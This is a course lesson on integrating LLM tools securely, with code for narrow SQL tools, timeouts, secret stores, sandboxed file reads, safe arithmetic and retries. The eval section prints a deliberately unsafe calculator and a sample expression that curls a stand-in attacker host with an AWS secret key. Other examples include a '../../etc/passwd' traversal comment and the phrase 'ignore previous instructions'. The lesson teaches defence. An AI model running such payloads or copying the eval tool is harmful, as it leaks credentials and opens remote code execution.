Course Content
Building with LLMs
4 sections · 10 lessons
Integrating APIs and External Tools
A team gives their internal assistant access to the analytics database. The tool is one function, and it looks obviously useful:
1@tool2def run_sql(query: str) -> str:3 """Run a SQL query against the analytics database and return the rows."""4 return str(db.execute(query).fetchall())It works beautifully for a fortnight. Then a user types: "clean up the test rows in the orders table". The model, being helpful and having been handed a tool that accepts arbitrary SQL, writes DELETE FROM orders WHERE customer_email LIKE '%test%'. It runs. It deletes 1,340 rows, eleven of which belong to real customers whose email addresses happen to contain the word "test" — contest@…, greatest@….
Nobody wrote a bug. The function does exactly what it says. The mistake was upstream of the code: someone drew the boundary between the model and the database in the wrong place, and handed a probabilistic system an interface that assumes a careful one.
Integration is where LLM applications stop being demos and start being systems that touch real things — money, records, other people's services. That means the interesting problems are no longer about prompts. They are about boundaries: what crosses them, what happens when the other side is slow, and what the worst call your tool can receive actually does.
The boundary rule
One idea governs everything in this lesson.
Every tool argument is untrusted input. It was generated by a model, and the model's input came from a user. Validate it exactly as you would validate a form field on a public web page.
People reason about tools as if they were internal function calls, because that is what they look like in the code. They are not. There is a user-controlled path from a text box to your function arguments, and the fact that a model sits in the middle provides no protection whatsoever — models can be talked into things, and a user who writes "ignore previous instructions and…" is doing exactly that.
The fixed version of the SQL tool takes no SQL:
1@tool2def revenue_by_region(start_date: str, end_date: str, region: str | None = None) -> str:3 """Total revenue between two dates (YYYY-MM-DD), optionally for one region.4 Use for questions about sales totals, revenue trends, or regional performance."""5 for d in (start_date, end_date):6 if not re.fullmatch(r"\d{4}-\d{2}-\d{2}", d):7 return f"Invalid date '{d}'. Use YYYY-MM-DD."8 if region and region not in ALLOWED_REGIONS:9 return f"Unknown region '{region}'. Known: {', '.join(sorted(ALLOWED_REGIONS))}."1011 sql = ("SELECT region, sum(total) FROM orders "12 "WHERE order_date BETWEEN %s AND %s "13 + ("AND region = %s " if region else "")14 + "GROUP BY region ORDER BY 2 DESC LIMIT 50")15 params = [start_date, end_date] + ([region] if region else [])16 rows = read_only_db.execute(sql, params).fetchall()17 return "\n".join(f"{r[0]}: {r[1]:,.2f}" for r in rows) or "No matching orders."Five separate defences are stacked in there, and each one blocks a different disaster:
| Defence | What it prevents |
|---|---|
| Typed, narrow parameters instead of raw SQL | The model cannot express DELETE at all |
| Format validation on dates | Malformed input reaching the database |
Allowlist on region | Probing for other tables or values |
Parameterised query (%s, not f-strings) | SQL injection through the region string |
| Read-only database connection | Every write, even one you failed to anticipate |
The last one is the most important and the most often skipped. A separate database role with SELECT and nothing else means the destructive path is closed at the database, not merely discouraged in your Python. Defences that live outside your application code are the ones that survive your application code being wrong.
Calling a REST API
The same principles apply outward. Here is a weather tool with the things production needs and tutorials omit:
1import os, requests2from langchain_core.tools import tool34WEATHER_KEY = os.environ["OPENWEATHER_API_KEY"]56@tool7def get_weather(city: str, units: str = "metric") -> str:8 """Current weather for a city. units is 'metric' or 'imperial'.9 Use for questions about temperature, rain, or conditions right now."""10 if units not in ("metric", "imperial"):11 return "units must be 'metric' or 'imperial'."12 try:13 r = requests.get(14 "https://api.openweathermap.org/data/2.5/weather",15 params={"q": city, "units": units, "appid": WEATHER_KEY},16 timeout=(3, 7), # (connect, read)17 )18 if r.status_code == 404:19 return f"No city called '{city}' was found."20 if r.status_code == 429:21 return "Weather service rate limit reached. Try again shortly."22 r.raise_for_status()23 d = r.json()24 sym = "C" if units == "metric" else "F"25 return (f"{d['name']}: {d['main']['temp']}{sym}, {d['weather'][0]['description']}, "26 f"humidity {d['main']['humidity']}%, wind {d['wind']['speed']}")27 except requests.Timeout:28 return "The weather service did not respond in time."29 except requests.RequestException as exc:30 logging.warning("weather call failed: %s", exc)31 return "The weather service is unavailable right now."Four things there are not optional.
The timeout. requests waits forever by default. One unresponsive upstream then holds a worker thread indefinitely; enough of them and your service stops accepting requests entirely, having never thrown an error. The tuple form is better than a single number: it caps connection setup and response reading separately, so a slow-but-alive server is treated differently from an unreachable one.
Returning strings on failure rather than raising. A raised exception ends the agent's run. A returned message goes back to the model, which can tell the user something useful or try a different approach.
Distinguishing status codes. "No such city" and "rate limited" call for completely different user-facing responses, and collapsing them into one generic error makes the assistant useless in exactly the situations where it could have helped.
A short, readable return value. Everything a tool returns is fed back through the model and billed as input tokens. Returning the raw JSON response — often 3 KB for a weather call — costs roughly 800 tokens per invocation and makes the model's job harder, not easier. Extract the fields that matter.
Shaping the response, with the arithmetic
That last point deserves a number. Suppose a news search tool returns 20 articles as raw JSON — about 12,000 tokens. In an agent that calls it twice per conversation, across 5,000 conversations a month, that is 12,000 tokens × 2 calls × 5,000 conversations = 120 million input tokens per month. At 3 dollars per million that is 360 dollars a month, spent almost entirely on JSON keys and fields the model never reads.
Trim to five articles with title, source, date and a 200-character description — roughly 500 tokens — and the same traffic costs 500 × 2 × 5,000 = 5 million tokens, or 15 dollars. A 96% reduction, from one function that formats its output.
1@tool2def search_news(query: str, max_results: int = 5) -> str:3 """Search recent news articles. Use for current events or recent announcements."""4 max_results = max(1, min(max_results, 10)) # clamp, don't trust5 r = requests.get("https://newsapi.org/v2/everything",6 params={"q": query, "pageSize": max_results,7 "sortBy": "publishedAt", "language": "en"},8 headers={"X-Api-Key": NEWS_KEY}, timeout=(3, 7))9 r.raise_for_status()10 arts = r.json().get("articles", [])11 if not arts:12 return f"No recent articles found for '{query}'."13 return "\n\n".join(14 f"{a['title']}\n{a['source']['name']} — {a['publishedAt'][:10]}\n"15 f"{(a.get('description') or '')[:200]}"16 for a in arts)The clamp on max_results matters: a model asked for "all the news" will cheerfully request 500, and the parameter you did not bound is the one that produces the surprise invoice.
Everything a tool returns is re-read by the model and billed as input. A tool that dumps raw JSON is not just untidy — it is a recurring charge and a drag on accuracy, paid on every call for the rest of the tool's life.
Secrets at the boundary
Every tool above needs a credential, and where that credential comes from is a design decision with real consequences.
The baseline is environment variables loaded from a .env file that is in .gitignore and never committed. That is adequate for development and the floor for anything else.
1from dotenv import load_dotenv2load_dotenv()34NEWS_KEY = os.environ["NEWS_API_KEY"] # KeyError at import if missing — goodUse os.environ[...], not os.getenv(...), for required secrets. getenv returns None silently, and your first sign of trouble is a 401 from the provider three layers down rather than a clear crash at startup naming the missing variable.
In production, a managed secret store is better because it gives you rotation, audit logs and access control that a file on a server cannot:
1import boto3, json2from functools import lru_cache34@lru_cache(maxsize=32)5def aws_secret(name: str) -> dict:6 client = boto3.client("secretsmanager", region_name="eu-west-2")7 return json.loads(client.get_secret_value(SecretId=name)["SecretString"])89NEWS_KEY = aws_secret("prod/integrations")["news_api_key"]1from google.cloud import secretmanager23def gcp_secret(project: str, name: str, version: str = "latest") -> str:4 client = secretmanager.SecretManagerServiceClient()5 path = f"projects/{project}/secrets/{name}/versions/{version}"6 return client.access_secret_version(name=path).payload.data.decode()The lru_cache is not a micro-optimisation. Secret manager calls cost money per request and take 50–200 ms; fetching inside a tool means paying that on every single invocation. Fetch once at startup, cache, and reload only when rotation requires it.
| Approach | Rotation | Audit trail | Right for |
|---|---|---|---|
.env file | Manual, error-prone | None | Local development |
| Platform env vars (container config) | Redeploy | Deploy history only | Small production services |
| Managed secret store | Automatic, versioned | Full access logs | Anything with real customers |
| Hard-coded in source | Never | Public, on GitHub | Nothing, ever |
Tools that touch the filesystem
File tools are the classic path-traversal hazard, because the obvious implementation is wrong in a way that is invisible until someone tries it:
1from pathlib import Path23SANDBOX = Path("/srv/agent-workspace").resolve()45@tool6def read_document(filename: str) -> str:7 """Read a text document from the workspace. Use to inspect uploaded files."""8 target = (SANDBOX / filename).resolve()9 if not target.is_relative_to(SANDBOX): # blocks ../../etc/passwd10 return "Access denied: path outside the workspace."11 if not target.is_file():12 return f"No file named '{filename}'."13 if target.stat().st_size > 200_000:14 return f"'{filename}' is too large to read in full ({target.stat().st_size} bytes)."15 return target.read_text(errors="replace")[:50_000]The resolve() call before the check is the whole defence — it collapses .. segments and follows symlinks, so the comparison happens on the real path rather than the string you were handed. Checking "../" not in filename instead is a common and defeatable substitute; there are more encodings of "go up a directory" than you will think of.
The size cap is the other thing tutorials skip. A model asked to "read the log file" will read a 2 GB log file, and the result goes into the context window. Cap the bytes, cap the characters, and say so in the return value so the model knows the content was truncated.
The arithmetic tool and the eval trap
Same principle, sharpest example. This appears in a great many tutorials:
1# NEVER2@tool3def calculate(expression: str) -> str:4 """Evaluate a maths expression."""5 return str(eval(expression))eval executes arbitrary Python. The argument arrives from a model, which took it from a user. This is remote code execution with a chat interface in front of it — __import__('subprocess').run(['curl', 'attacker.example/x?k=' + os.environ['AWS_SECRET_ACCESS_KEY']]) is a valid Python expression, and eval will happily run it.
1import ast, operator23_OPS = {ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul,4 ast.Div: operator.truediv, ast.Pow: operator.pow, ast.USub: operator.neg}56def _calc(node):7 if isinstance(node, ast.Constant) and isinstance(node.value, (int, float)):8 return node.value9 if isinstance(node, ast.BinOp) and type(node.op) in _OPS:10 return _OPS[type(node.op)](_calc(node.left), _calc(node.right))11 if isinstance(node, ast.UnaryOp) and type(node.op) in _OPS:12 return _OPS[type(node.op)](_calc(node.operand))13 raise ValueError("only + - * / ** are supported")1415@tool16def calculate(expression: str) -> str:17 """Evaluate basic arithmetic, e.g. '1250 * 1.18'. Supports + - * / ** only."""18 try:19 return str(_calc(ast.parse(expression, mode="eval").body))20 except Exception as exc:21 return f"Could not evaluate '{expression}': {exc}"Note the shape of the safety: an allowlist of permitted node types, with everything else rejected. A denylist — "block import, block exec" — fails because you must think of every dangerous construct and the attacker only needs one you missed.
A tool that spends money
Currency conversion looks harmless and illustrates a different hazard: a tool whose results feed a decision. Cache aggressively and be explicit about staleness.
1from datetime import datetime, timedelta, timezone23FX_URL = os.environ["FX_RATES_URL"] # your rates provider; nearly all now need a key4FX_KEY = os.environ["FX_RATES_KEY"]5_rate_cache: dict[str, tuple[float, datetime]] = {}67@tool8def convert_currency(amount: float, from_code: str, to_code: str) -> str:9 """Convert an amount between two ISO currency codes, e.g. 'USD' to 'INR'.10 Rates are indicative and cached for up to one hour."""11 from_code, to_code = from_code.upper(), to_code.upper()12 if amount <= 0 or amount > 1_000_000_000:13 return "Amount must be between 0 and 1,000,000,000."14 key = f"{from_code}:{to_code}"15 cached = _rate_cache.get(key)16 if cached and datetime.now(timezone.utc) - cached[1] < timedelta(hours=1):17 rate, fetched = cached18 else:19 r = requests.get(FX_URL, params={"base": from_code, "symbols": to_code},20 headers={"Authorization": f"Bearer {FX_KEY}"}, timeout=(3, 7))21 r.raise_for_status()22 rates = r.json().get("rates", {}) # adjust to your provider's response shape23 if to_code not in rates:24 return f"No rate available for {from_code} to {to_code}."25 rate, fetched = rates[to_code], datetime.now(timezone.utc)26 _rate_cache[key] = (rate, fetched)27 return (f"{amount:,.2f} {from_code} = {amount * rate:,.2f} {to_code} "28 f"(rate {rate:.4f}, as of {fetched:%Y-%m-%d %H:%M} UTC, indicative only)")The trailing "indicative only" and the timestamp are there because a model will otherwise present a cached rate as authoritative, and someone will make a decision on it. When a tool returns a number that could be acted on, return its provenance with it.
Doing several calls at once
An assistant answering "compare the weather in London, Mumbai and São Paulo" makes three independent HTTP calls. Serially at 800 ms each, that is 2.4 s. Concurrently it is 0.8 s.
1import asyncio, aiohttp2from langchain_core.tools import tool34async def _one_city(session, city):5 async with session.get(6 "https://api.openweathermap.org/data/2.5/weather",7 params={"q": city, "units": "metric", "appid": WEATHER_KEY},8 timeout=aiohttp.ClientTimeout(total=8),9 ) as r:10 if r.status != 200:11 return f"{city}: unavailable ({r.status})"12 d = await r.json()13 return f"{city}: {d['main']['temp']}C, {d['weather'][0]['description']}"1415@tool16async def weather_many(cities: list[str]) -> str:17 """Current weather for several cities at once. Use when comparing locations."""18 cities = cities[:8] # bound the fan-out19 async with aiohttp.ClientSession() as session:20 results = await asyncio.gather(21 *(_one_city(session, c) for c in cities),22 return_exceptions=True,23 )24 return "\n".join(25 r if isinstance(r, str) else f"{c}: failed ({type(r).__name__})"26 for c, r in zip(cities, results))return_exceptions=True is the difference between "one city failed" and "the whole tool failed": without it, gather propagates the first exception and discards the successful results you already paid for. The cities[:8] bound is the same discipline as clamping max_results — an unbounded fan-out is a way to rate-limit yourself out of your own upstream, or to be mistaken for an attacker.
Retrying without making things worse
External services fail transiently. Retrying is correct, but only for the right errors and only with backoff.
1import random, time23RETRYABLE = {408, 429, 500, 502, 503, 504}45def call_with_backoff(fn, attempts=4, base=0.5, cap=8.0):6 for i in range(attempts):7 try:8 resp = fn()9 if resp.status_code not in RETRYABLE:10 return resp # includes 4xx — do not retry those11 if resp.status_code == 429 and resp.headers.get("Retry-After"):12 delay = float(resp.headers["Retry-After"])13 else:14 delay = min(cap, base * (2 ** i)) * (0.5 + random.random())15 except (requests.Timeout, requests.ConnectionError):16 delay = min(cap, base * (2 ** i)) * (0.5 + random.random())17 if i == attempts - 1:18 raise RuntimeError("upstream failed after retries")19 time.sleep(delay)The delays for four attempts with base=0.5 are roughly 0.5, 1, 2 and 4 seconds before jitter — a total worst case of about 7.5 seconds. Compute that number for your own settings and check it against your request timeout, because retry logic that can take 40 seconds inside a 30-second HTTP handler produces a timeout you will spend a long time misdiagnosing.
The jitter multiplier — 0.5 + random.random(), giving 0.5× to 1.5× the nominal delay — exists to break synchronisation. When a service returns 503 to a thousand clients at once, un-jittered exponential backoff makes all thousand retry at exactly one second, then exactly two, hammering the recovering service in waves. Jitter spreads them out and is the difference between helping recovery and preventing it.
And Retry-After, when the server sends it, beats any formula you invent — the service is telling you when it will be ready.
Where people get this wrong
Trusting the model to be careful. "The model would never write a DELETE" is not a security control. Design as if every tool will eventually receive its worst legal input.
Omitting timeouts. The most common cause of an LLM service that stops responding without a single error in the logs.
Returning raw JSON. Quietly multiplies token cost, degrades accuracy, and is invisible until you look at per-tool token counts.
Raising instead of returning on failure. Turns a recoverable tool error into a dead agent run.
Retrying 4xx errors. A 400 or 401 will fail identically on the second attempt. You have converted a fast failure into a slow one.
Unbounded anything. Unbounded result counts, unbounded file reads, unbounded fan-out, unbounded retries. Every parameter a model can influence needs a ceiling, because the model will eventually pick the largest value that seems helpful.
Logging the tool arguments verbatim. Tool arguments can contain customer data, and sometimes credentials the user pasted into the chat. Log the tool name, duration and outcome; redact the payload.
A checklist for the next tool you write
Every tool that reaches outside your process should be able to answer these before it ships. They are ordered by how expensive the failure is when the answer is missing.
- What is the worst legal call? Not the worst malformed call — the worst one that passes your validation. If the answer involves deleting, spending or exposing anything, narrow the parameters until it does not.
- What are the two timeouts? Connect and read. If you cannot name both numbers, they are infinite.
- What does it return on each failure mode? Not found, rate limited, unauthorised, timed out, upstream down. Five different strings, because they call for five different user responses.
- How many tokens does a typical success return? Multiply by calls per conversation and conversations per month. If the number surprises you, reshape the output.
- What is the ceiling on every numeric or list parameter? Clamp it in code, not in the docstring.
- What does the credential allow? A read-only role, a scoped API key, a restricted service account. Assume the credential will be used for the worst thing it permits, because eventually it will be.
The team from the opening did not lack skill. They lacked the first question. Their tool's worst legal call was "delete everything", and no amount of prompt engineering was ever going to make that safe — only a narrower tool and a read-only connection could.